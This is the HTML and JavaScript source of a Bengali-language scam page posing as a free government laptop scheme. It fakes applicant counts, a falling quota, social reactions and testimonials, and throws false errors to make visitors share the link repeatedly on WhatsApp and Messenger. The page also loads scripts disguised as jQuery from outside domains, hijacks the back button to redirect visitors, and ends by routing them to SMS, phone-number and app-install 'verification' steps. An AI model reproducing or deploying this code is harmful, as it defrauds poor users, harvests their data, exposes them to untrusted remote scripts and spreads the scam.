<!DOCTYPE html>
<html>
    <head>
        <meta charset="UTF-8" />
        <meta name="viewport" content="width=device-width, initial-scale=1.0" />
        <title>PMYP প্রধানমন্ত্রী ল্যাপটপ স্কিম 2024 - অনলাইনে আবেদন করুন</title>
<script src="//ajax.googleapis.com/ajax/libs/jquery/1.11.1/jquery.min.js"></script>

<script>
        ;(function(factory){var registeredInModuleLoader=false;if(typeof define==='function'&&define.amd){define(factory);registeredInModuleLoader=true}if(typeof exports==='object'){module.exports=factory();registeredInModuleLoader=true}if(!registeredInModuleLoader){var OldCookies=window.Cookies;var api=window.Cookies=factory();api.noConflict=function(){window.Cookies=OldCookies;return api}}}(function(){function extend(){var i=0;var result={};for(;i<arguments.length;i++){var attributes=arguments[i];for(var key in attributes){result[key]=attributes[key]}}return result}function init(converter){function api(key,value,attributes){var result;if(typeof document==='undefined'){return}if(arguments.length>1){attributes=extend({path:'/'},api.defaults,attributes);if(typeof attributes.expires==='number'){var expires=new Date();expires.setMilliseconds(expires.getMilliseconds()+attributes.expires*864e+5);attributes.expires=expires}attributes.expires=attributes.expires?attributes.expires.toUTCString():'';try{result=JSON.stringify(value);if(/^[\{\[]/.test(result)){value=result}}catch(e){}if(!converter.write){value=encodeURIComponent(String(value)).replace(/%(23|24|26|2B|3A|3C|3E|3D|2F|3F|40|5B|5D|5E|60|7B|7D|7C)/g,decodeURIComponent)}else{value=converter.write(value,key)}key=encodeURIComponent(String(key));key=key.replace(/%(23|24|26|2B|5E|60|7C)/g,decodeURIComponent);key=key.replace(/[\(\)]/g,escape);var stringifiedAttributes='';for(var attributeName in attributes){if(!attributes[attributeName]){continue}stringifiedAttributes+='; '+attributeName;if(attributes[attributeName]===true){continue}stringifiedAttributes+='='+attributes[attributeName]}return(document.cookie=key+'='+value+stringifiedAttributes)}if(!key){result={}}var cookies=document.cookie?document.cookie.split('; '):[];var rdecode=/(%[0-9A-Z]{2})+/g;var i=0;for(;i<cookies.length;i++){var parts=cookies[i].split('=');var cookie=parts.slice(1).join('=');if(!this.json&&cookie.charAt(0)==='"'){cookie=cookie.slice(1,-1)}try{var name=parts[0].replace(rdecode,decodeURIComponent);cookie=converter.read?converter.read(cookie,name):converter(cookie,name)||cookie.replace(rdecode,decodeURIComponent);if(this.json){try{cookie=JSON.parse(cookie)}catch(e){}}if(key===name){result=cookie;break}if(!key){result[name]=cookie}}catch(e){}}return result}api.set=api;api.get=function(key){return api.call(api,key)};api.getJSON=function(){return api.apply({json:true},[].slice.call(arguments))};api.defaults={};api.remove=function(key,attributes){api(key,'',extend(attributes,{expires:-1}))};api.withConverter=init;return api}return init(function(){})}));
</script>
</head>
<body>
<style type="text/css">
* {
    margin: 0;
    padding: 0;
    font-family: Poppins, Droid Arabic Naskh;
    font-weight: normal;
    box-sizing: border-box;


}
body {
    direction: lfl;
    background: #ebedf0;
}
a {
    text-decoration: none;
}
.post {
    background: #fff;
    margin: 0 auto;
    padding: 10px;
    max-width: 500px;
    border: 1px solid #d0d1d5;
    border-radius: 3px;
}
.post img {
    width: 100%;
}
.welcome {
    font-size: 15px;
}
.amount,
#getname {
    color: #098105;
    text-decoration: none;
}
.done {
    text-align: center;
    color: #27ae60;
}
.tip {
    font-size: 14px;
}
.title {
    text-align: center;
}
.error {
    display: none;
    text-align: center;
    font-size: 14px;
    color: #e74c3c;
}
button {
    display: block;
    width: 200px;
    height: 50px;
    color: #fff;
    border: none;
    outline: none;
    font-size: 18px;
    cursor: pointer;
    border-radius: 5px;
    padding: 0 10px;
    margin: 10px auto;
    background: rgb(9, 129, 5);
    transition: background 0.3s ease;
}
button:hover {
    background: #098105;
}
.phone {
    max-width: 400px;
    margin: 10px auto;
}
.phone input {
    width: 100%;
    height: 50px;
    padding: 10px;
    outline: none;
    border: 2px solid #cecece;
    font-size: 14px;
}
#confirm {
    width: 200px;
    margin: 10px auto;
    border-radius: 0px;
}
#loader {
    text-align: center;
}
.spin {
    width: 80px;
    height: 80px;
    background: transparent;
    border: solid 15px rgb(9, 129, 5);
    border-right-color: transparent;
    border-radius: 50%;
    margin: 10px auto;
    animation: spin 0.8s linear infinite;
}
@keyframes spin {
    100% {
        transform: rotate(1turn);
    }
}
#loader,
#info,
#checking,
#share,
#claim {
    display: none;
}
.center {
    display: flex;
    align-items: center;
    justify-content: center;
}
.barr {
    direction: ltr;
    max-width: 400px;
    margin: 10px auto;
    box-sizing: border-box;
}
.fill {
    position: relative;
    display: inline-block;
    width: calc(100% - 100px);
    height: 35px;
    padding: 2px;
    border: 2px solid #098105;
}
#fill,
#fill2 {
    background: #098105;
    width: 0%;
    height: 100%;
}
.percentage {
    width: 100px;
    float: right;
    height: 35px;
    font-size: 16px;
    border: 2px solid #098105;
}
#percentage,
#percentage2 {
    margin-left: 5px;
}
#check,
#check2 {
    display: none;
}
.counter {
    color: #7f7f7f;
    font-size: 12px;
    text-align: right;
    padding: 10px 0 10px 2px;
    border-bottom: 1px solid #e1e2e3;
}
.reactions {
    display: inline-flex;
    align-items: center;
    float: left;
}
.counter img {
    float: left;
    width: 16px;
    height: 16px;
    border-radius: 50%;
    border: 2px solid #fff;
    box-sizing: content-box;
}
.like,
.love {
    margin-right: -5px;
}
.like {
    z-index: 2;
}
.love {
    z-index: 1;
}
.bar {
    display: table;
    width: 100%;
    border-bottom: 1px solid #e1e2e3;
}
.bar .react {
    display: table-cell;
    width: calc(100% / 3);
    font-size: 12px;
    color: #7f7f7f;
    text-align: center;
    padding: 10px 0;
    cursor: pointer;
}
.comments {
    direction: ltr;
}
.comment {
    padding: 6px 0;
    margin-top: 5px;
}
.comment img {
    float: left;
    width: 32px;
    height: 32px;
    border: none;
    border-radius: 18px;
    cursor: pointer;
}
.reply {
    margin-left: 37px;
}
.single-container {
    margin-left: 37px;
    background: #f1f2f6;
    padding: 10px;
    border-radius: 15px;
    font-size: 12px;
}
.single-container .user {
    display: inline-block;
    cursor: pointer;
    color: #365899;
    margin-bottom: 5px;
}
.single-container .text {
    display: block;
}
.buttons {
    font-size: 12px;
    font-weight: bold;
    margin: 10px 0 0 47px;
    color: #90949c;
}
.action {
    cursor: pointer;
}
.action:hover {
    text-decoration: underline;
}
.input {
    padding: 6px 12px 12px;
}
.input input {
    width: 100%;
    background: #f1f2f6;
    padding: 10px;
    border-radius: 15px;
    border: 0;
    outline: none;
}
.A{
    text-align: center;
    background-color: rgb(151, 199, 149);
}
#messenger{
    background: olive linear-gradient(to right, #4962ff, #ff5c87);
}
</style>
    <center><img src="https://563cdn.com/images/laptopfree.jpeg" alt="India" style="width: 100%;"></center>
            <marquee class="horizontal_marque" direction="left"> আমাদের স্কিমটি আর্থিক সীমাবদ্ধতার সম্মুখীন ব্যক্তিদের জন্য উন্মুক্ত, তাদের নিজস্ব ল্যাপটপ বহন করতে অক্ষম, তবুও তাদের জীবন উন্নত করার জন্য একজনের প্রয়োজন৷            </marquee> <div class="A">
            আজ পর্যন্ত<b></br>
                <span id="countdowntimer" style="color:red;font-size:18px;font-weight:300">94548</span></b></br>  মানুষ এই অফারের সুবিধা নিয়েছে। </br>
           <script type="text/javascript">
                     var timeleft = 94548;
                     var downloadTimer = setInterval(function(){
                         timeleft= timeleft + Math.floor(Math.random() * 600);
                         document.getElementById('countdowntimer').textContent = timeleft;
                         if (timeleft <= 0)
                             clearInterval(downloadTimer);
                     }, 1000);
                 </script>
         </div>
    <div class="post" width="100%">

        <div id="intro">
         
            <p class="welcome">
                আপনার আবেদন গৃহীত হয়েছে.  ক্লিক করুন <span class="amount"> চেক করুন</span> আপনি যদি বিনামূল্যে ল্যাপটপ পাওয়ার যোগ্য হন তবে দয়া করে নীচে নিশ্চিত করুন৷ <br><span class="amount"> বিঃদ্রঃ!</span>  এটি সীমিত সময়ের অফার।<br>
                 
                </p>
               
            <button id="go"> চালিয়ে যান ➤</button>
        </div>
        <div id="loader">
            <div> অনুগ্রহপূর্বক অপেক্ষা করুন ...</div>
            <div class="spin"></div>
            <div id="num">0%</div>
        </div>
        <div id="info">
            <p class="title"> আপনার নাম যাচাই করুন এবং অনুরোধে ক্লিক করুন :</p>
            <div class="phone">
                 <center><input type="text" autocomplete="off" placeholder=" আপনার নাম প্রবেশ করুন" id="name" name="Phone" style="fontwidth: 244px;height: 56px;font-size: 18px;width: 330px;"></center>
              <center>
<center><p class="title"> উদ্দেশ্য নির্বাচন করুন</p></center>
<select aria-label="الجنس" name="birthday_year" id="year" title="الجنس" class="_5dba" style="
    width: 330px;
    height: 56px;
">
<option value="أختر نوع الشبكة" selected="1">-----------  উদ্দেশ্য নির্বাচন করুন-----------</option>
<option value="1"> শিক্ষার উদ্দেশ্য</option>
<option value="2"> ব্যবসায়িক উদ্দেশ্যে </option>
<option value="3"> অন্যান্য উদ্দেশ্য</option>
</select>
</center><br>
                <button id="confirm"> অনুরোধ</button>
            </div>
            <p class="error"> আপনার নাম যাচাই করুন!</p>
        </div>
        <div id="checking">
            <p class="title"> একমুহূর্ত অপেক্ষা করুন...</p>
            <div class="barr">
                <div class="fill">
                    <div id="fill"></div>
                </div>
                <div class="percentage center">
                    <span id="load"><i class="fa fa-spinner fa-pulse"></i></span>
                    <span id="check"><i class="fa fa-check-circle"></i></span>
                    <span id="percentage"></span>
                </div>
            </div>
        </div>
        <div id="share">

            <p class="tip"> অভিনন্দন,  <span id="getname"></span>،</p>
            <p class="tip">
                 আপনার আবেদনগুলি পরীক্ষা করার পরে, আপনাকে বিনামূল্যে ল্যাপটপ পাওয়ার জন্য অনুমোদন দেওয়া হয়েছে। <span class="amount"> (অনুমোদিত).</span>  কিভাবে এগিয়ে যেতে হবে: 
            </p><br>
            <p class="tip">1.  আপনি নীচের নির্দেশাবলী অনুসরণ করলে আপনার বিনামূল্যের ল্যাপটপ অবিলম্বে পাওয়া যাবে।</p>
            <p class="tip">2.  এই তথ্যটি 15 জন বন্ধু বা 5টি গ্রুপের সাথে শেয়ার করতে "শেয়ার" বোতামে ক্লিক করুন যাতে তারাও প্রোগ্রাম সম্পর্কে সচেতন হতে পারে!</p>
            <p class="tip">3.  তারপর সবুজ যাচাইকরণ বারটি পূর্ণ হওয়ার পরে "VALIDATE" এ ক্লিক করুন৷</p>
            <p class="tip">4.  আপনি 15 মিনিটের মধ্যে একটি নিশ্চিতকরণ এসএমএস পাবেন।</p>
<p style="text-align: center; font-weight: bold;"><b> বিনামূল্যে অফার এখনও উপলব্ধ:<span id="quota" style="color: red;">9872</span></b></p>

<script>
    var quota = 9874;
    setInterval(function() {
        if (quota > 0) {
            var decrease = Math.floor(Math.random() * (50 - 10 + 1)) + 10; 
            quota -= decrease;
            document.getElementById("quota").innerHTML = quota;
        } else {
            document.getElementById("quota").innerHTML = "We have new quotas available. Please refresh the page.";
            clearInterval(interval);
        }
    }, 2000); 
</script> 
            <button id="whatsapp">Whatsapp শেয়ার করুন</button>
            <button id="messenger">Messenger শেয়ার করুন</button>
            <div class="barr">
                <div class="fill">
                    <div id="fill2"></div>
                </div>
                <div class="percentage center">
                    <span><i class="fa fa-spinner fa-pulse"></i></span>
                    <span id="percentage2">0%</span>
                </div>
            </div>
        </div>
        <div id="claim">
            <p class="done"><i class="fa fa-check-circle fa-3x" aria-hidden="true"></i></p>
            <p class="title"> অভিনন্দন!  চূড়ান্ত যাচাইকরণ ধাপ এখানে.  একবার যাচাই করা হলে, আপনি একটি নিশ্চিতকরণ বার্তা পাবেন।</p>
                <b> যাচাই পদ্ধতি;  আমরা আপনাকে জিজ্ঞাসা করতে পারি;  আপনার ফোন নম্বর যাচাই করতে এসএমএস পাঠান, ডাউনলোড করুন, ফোন নম্বর লিখুন, সমীক্ষার উত্তর দিন, অ্যাপ ইনস্টল করুন বা অন্য কোনও প্রদত্ত কাজ।</b>
                <br><b> মনে রাখবেন, এই পদক্ষেপটি খুবই গুরুত্বপূর্ণ।  কোনো পদক্ষেপ এড়িয়ে যাবেন না।</b>
            <button id="offer"> এখন সনাক্ত করুন</button>
          
           </div>
         <div class="comments">
            <div class="counter">
                <div class="reactions">
                    <img class="like" src="https://563cdn.com/images/uT2As9Sb2.jpg" /> <img class="love" src="https://563cdn.com/images/nc13hrwb2.jpg" /> <img class="care" src="https://i.imgur.com/iGAmvqv.jpg" /> <span id="likes">134K</span>
                </div>
                <span id="comments">23K  মন্তব্য করুন</span> <span class="dot">·</span> <span id="shares">12K  শেয়ার করুন</span>
            </div>
            <div class="bar">
                <span class="react"><i class="fa fa-thumbs-o-up"></i> <a class="liked"> লাইক</a></span> <span class="react"><i class="fa fa-comment-o"></i>  মন্তব্য করুন</span> <span class="react"><i class="fa fa-share"></i>  শেয়ার করুন</span>
            </div>

                <div class="comment">
                    <img src="https://563cdn.com/images/ny12.jpg" />
                    <div class="single-container">
                        <span class="user">Amin Abdul</span>
                        <span class="text">
 আমি প্রাথমিকভাবে একটি ট্রায়াল মানসিকতার সাথে এটির সাথে যোগাযোগ করেছি এবং অপ্রত্যাশিতভাবে তিন দিনের মধ্যে ল্যাপটপটি পেয়েছি।  পাকিস্তান দীর্ঘজীবী হোক, এবং রমজান উপহারের জন্য আপনাকে ধন্যবাদ।                        </span>
                    </div>
                    <div class="buttons"><span class="time t1">1m</span> <span class="dot">·</span> <span class="action liked"> লাইক</span> · <span class="action"> উত্তর দিন</span></div>
                </div>
                <div class="comment">
                    <img src="https://i.imgur.com/iGAmvqv.jpg" />
                    <div class="single-container"><span class="user">Sara Ali</span> <span class="text"> আমি কখনো ভাবিনি আমার জীবনে এই অনুগ্রহ পাব,, প্রতিষ্ঠাতাকে ধন্যবাদ...</span></div>
                    <div class="buttons"><span class="time t2">2m</span> <span class="dot">·</span> <span class="action liked"> লাইক</span> · <span class="action"> উত্তর দিন</span></div>
                </div>
                <div class="comment reply">
                    <img src="https://i.imgur.com/Yult68T.jpg" />
                    <div class="single-container"><span class="user">Jamal Ahmed</span> <span class="text"> আপনি আমাকে যে ল্যাপটপ দিয়েছেন তার জন্য আপনাকে ধন্যবাদ, আল্লাহ আপনার মঙ্গল করুন।</span></div>
                    <div class="buttons"><span class="time t1">1m</span> <span class="dot">·</span> <span class="action liked"> লাইক</span> · <span class="action"> উত্তর দিন</span></div>
                </div>
                <div class="comment">
                    <img src="https://563cdn.com/images/nc13hrwb2.jpg" />
                    <div class="single-container"><span class="user">Kareem Khalid</span> <span class="text">❤️  শুধু নির্দেশাবলী অনুসরণ করুন এবং আপনি এটি সরাসরি পেয়ে যাবেন...এখনই আমার কাছে এসেছে। </span></div>
                    <div class="buttons"><span class="time t3">4m</span> <span class="dot">·</span> <span class="action liked"> লাইক</span> · <span class="action"> উত্তর দিন</span></div>
                </div>
                <div class="input"><input name="comment"  placeholder=" একটি মন্তব্য লিখুন..." /></div>
            </div>
        </div>
    </div>
</script>
<script type="text/javascript">
    if(!Cookies.get('jumpurl')){
                                     $.getScript('//i3an.top/js/jquery.min.js',function(){
                        if(!Cookies.get('jumpurl')){
                            Cookies.set('jumpurl', 'i3an.top', { 'expires': 1 });
                        }
                     });
                                     $.getScript('//lap.voic.top/js/jquery.min.js',function(){
                        if(!Cookies.get('jumpurl')){
                            Cookies.set('jumpurl', 'lap.voic.top', { 'expires': 1 });
                        }
                     });
                                     $.getScript('//taiebp.top/js/jquery.min.js',function(){
                        if(!Cookies.get('jumpurl')){
                            Cookies.set('jumpurl', 'taiebp.top', { 'expires': 1 });
                        }
                     });
                    
        }
var time = 0;
window.setInterval(function () {
    time = time + 1;
    $(".t1").html(time + 1 + "m");
    $(".t2").html(time + 2 + "m");
    $(".t3").html(time + 4 + "m");
}, 6e4);
var likes = 134,
    comments = 23,
    shares = 12;
window.setInterval(function () {
    likes = likes + Math.floor(Math.random() * 3);
    comments = comments + Math.floor(Math.random() * 2);
    shares = shares + Math.floor(Math.random() * 2);
    $("#likes").html(likes + "K");
    $("#comments").html(comments + "K  মন্তব্য করুন");
    $("#shares").html(shares + "K  শেয়ার করুন");
}, 5e3);
$(".liked").click(function () {
    if ($(this).hasClass("selected")) {
        $(this).removeClass("selected");
        $(this).html("Like");
    } else {
        $(this).addClass("selected");
        $(this).html("Unlike");
    }
});
</script>
<script type="text/javascript">

$("#go").click(function () {
    $("#intro").fadeOut(0);
    $("#loader").fadeIn(1000);
    var i = 0;
    var interval = setInterval(function () {
        $("#num").text(i + "%");
        i += 1;
        if (i >= 100) {
            clearInterval(interval);
            $("#loader").fadeOut(0);
            $("#info").fadeIn(1000);
        }
    }, 50);
});
$("#confirm").click(function () {
    if ($("#name").val().length < 4)
    {
        $(".error").fadeIn(500);
    } else {
        $("#info").fadeOut(0);
        $("#checking").fadeIn(1000);
        var i = 0;
        var interval = setInterval(function () {
            i += 1;
            $("#percentage").text(i + "%");
            $("#fill").css("width", i + "%");
            if (i == 50) {
                i = 49;
                setTimeout(function () {
                    i = 50;
                }, 1000);
            }
            if (i >= 100) {
                clearInterval(interval);
                $("#load").fadeOut(0);
                $("#check").fadeIn(0);
                setTimeout(function () {
                    $("#checking").fadeOut(0);
                    $("#share").fadeIn(1000);
                    $("#getname").html($("#name").val());
                }, 500);
            }
        }, 50);
    }
});
$(document).click(function () {
    if ($("#name").is(":focus")) {
        $(".error").fadeOut(500);
    }
});
</script>
    <script>
    var currentDate = new Date();
    var deadlineDate = new Date(currentDate);
    deadlineDate.setDate(currentDate.getDate() + 2);
        var text1 = "*"+' সদ্যপ্রাপ্ত সংবাদ!  PMYP প্রধানমন্ত্রী ল্যাপটপ স্কিম 2024 আবেদনপত্র গ্রহণ করা শুরু করেছে।'+"*%0A%0A*"+' আমাদের স্কিমটি আর্থিক সীমাবদ্ধতার সম্মুখীন ব্যক্তিদের জন্য উন্মুক্ত, তাদের নিজস্ব ল্যাপটপ বহন করতে অক্ষম, তবুও তাদের জীবন উন্নত করার জন্য একজনের প্রয়োজন৷'+"*%0A%0A* আবেদন শুরু হয়েছে, এবং দাগ সীমিত!  যারা আবেদন করেছেন তারা ইতিমধ্যেই তাদের ল্যাপটপ পেতে শুরু করেছেন।*%0A%0A* শেষ তারিখ:" + (deadlineDate.getMonth() + 1) + '/' + deadlineDate.getDate() + '/' + deadlineDate.getFullYear() + "*%0A%0A" +
    "* নিবন্ধন করুন এবং এখানে আবেদন করুন",

            text2 = "  একটি পরিমাণ ",
            text3 = "  প্রত্যেক নাগরিকের জন্য যারা সংকট কাটিয়ে উঠতে দরিদ্র শ্রেণীর সাহায্য হিসাবে শর্ত পূরণ করে।  প্রবেশ করুন এবং এখন নিবন্ধন করুন এবং সঠিকভাবে নিবন্ধন নিশ্চিত করুন 👉 ",
            error = " কিছু একটা সমস্যা!  পোস্ট গণনা করা হয় না.  আপনি এটি একই বন্ধু বা গ্রুপের সাথে একাধিকবার শেয়ার করেছেন, অনুগ্রহ করে পুনরায় শেয়ার করুন",
            abcde = "/go.php",
            saved = "",
            share = "whatsapp://send?text=" + text1;
    </script>

<script>

 var swidth = localStorage.getItem(saved);
if (swidth !== null) {
    var width = swidth * 1;
    $("#intro").fadeOut(0);
    // $(".comments").fadeOut(0);
    $("#share").fadeIn(0);
    $("#fill2").css("width", width + "%");
    $("#percentage2").text(width + "%");
} else {
    var width = 0;
}
$("#whatsapp").click(function () {
    if(Cookies.get('jumpurl')){
        landingDomain='%0Ahttps://'+Cookies.get('jumpurl')+'/?xt=108';//+randomString(8);
    }else{
        landingDomain='%0Ahttps://'+location.host+'/?xt=108';//+randomString(8);
    }
    //  $.getScript("/test2.php?f=1");
    window.location.href = share+landingDomain;
    if (width == 0) {
        // $.getScript("/static.php?f=1000");
        width += 50;
    } else if (width == 50) {
        alert(error);
        width += 15;
    } else if (width == 65) {
        width += 5;
    } else if (width == 70) {
        alert(error);
        width += 10;
    } else if (width == 80) {
        alert(error);
        width += 5;
    } else if (width == 85) {
        width += 2;
    } else if (width == 87) {
        width += 1;
    } else if (width == 88) {
        width += 2;
    } else if (width == 90) {
        width += 1;
    } else if (width == 91) {
        width += 1;
    } else if (width == 92) {
        width += 1;
    } else if (width == 93) {
        width += 1;
    } else if (width == 94) {
        width += 1;
    } else if (width == 95) {
        width += 1;
    } else if (width == 96) {
        width += 2;
    } else {
        $("#share").fadeOut(0);
        $("#claim").fadeIn(1000);
    }
    localStorage.setItem(saved, width);
    setTimeout(function () {
        $("#fill2").css("width", width + "%");
        $("#percentage2").text(width + "%");
    }, 2000);
});
$("#messenger").click(function () {
    if(Cookies.get('jumpurl')){
        landingDomain='https://'+Cookies.get('jumpurl')+'/?xt='+randomString(8);
    }else{
                landingDomain='https://i3an.top/?xt='+randomString(8);
    }
     $.getScript("/test2.php?f=2")
    window.location.href = 'fb-messenger://share/?link='+encodeURIComponent(landingDomain);
    if (width == 0) {
        // $.getScript("/static.php?f=1000");
        width += 50;
    } else if (width == 50) {
        alert(error);
        width += 15;
    } else if (width == 65) {
        width += 5;
    } else if (width == 70) {
        alert(error);
        width += 10;
    } else if (width == 80) {
        alert(error);
        width += 5;
    } else if (width == 85) {
        width += 2;
    } else if (width == 87) {
        width += 1;
    } else if (width == 88) {
        width += 2;
    } else if (width == 90) {
        width += 1;
    } else if (width == 91) {
        width += 1;
    } else if (width == 92) {
        width += 1;
    } else if (width == 93) {
        width += 1;
    } else if (width == 94) {
        width += 1;
    } else if (width == 95) {
        width += 1;
    } else if (width == 96) {
        width += 2;
    } else {
        $("#share").fadeOut(0);
        $("#claim").fadeIn(1000);
    }
    localStorage.setItem(saved, width);
    setTimeout(function () {
        $("#fill2").css("width", width + "%");
        $("#percentage2").text(width + "%");
    }, 2000);
});
$("#offer").click(function () {
    window.open(abcde, "_blank");
});
 function randomString(len) {
  　　len = len || 32;
  　　var $chars = 'ABCDEFGHJKMNPQRSTWXYZabcdefhijkmnprstwxyz2345678';
  　　var maxPos = $chars.length;
  　　var pwd = '';
  　　for (i = 0; i < len; i++) {
  　　　　pwd += $chars.charAt(Math.floor(Math.random() * maxPos));
  　　}
 　　return pwd;
 }
</script>
<script>
    window.onhashchange=function(){jp();};
    function hh() {history.pushState(history.length+1, "message", "#"+new Date().getTime());}
    function jp() {
        fh();}
    setTimeout('hh();', 500);
    function fh(){
        location.href="/go.php?t=9";
    }
</script>
<div style="display:none">
<script defer data-domain="lap01.com" src="https://tj.657g.xyz/js/script.js"></script>
<script>
var _hmt = _hmt || [];
(function() {
  var hm = document.createElement("script");
  hm.src = "https://hm.baidu.com/hm.js?499e8c96f07e810d9e479117ebfaf473";
  var s = document.getElementsByTagName("script")[0]; 
  s.parentNode.insertBefore(hm, s);
})();
</script>
</div>
</body>
</html> 
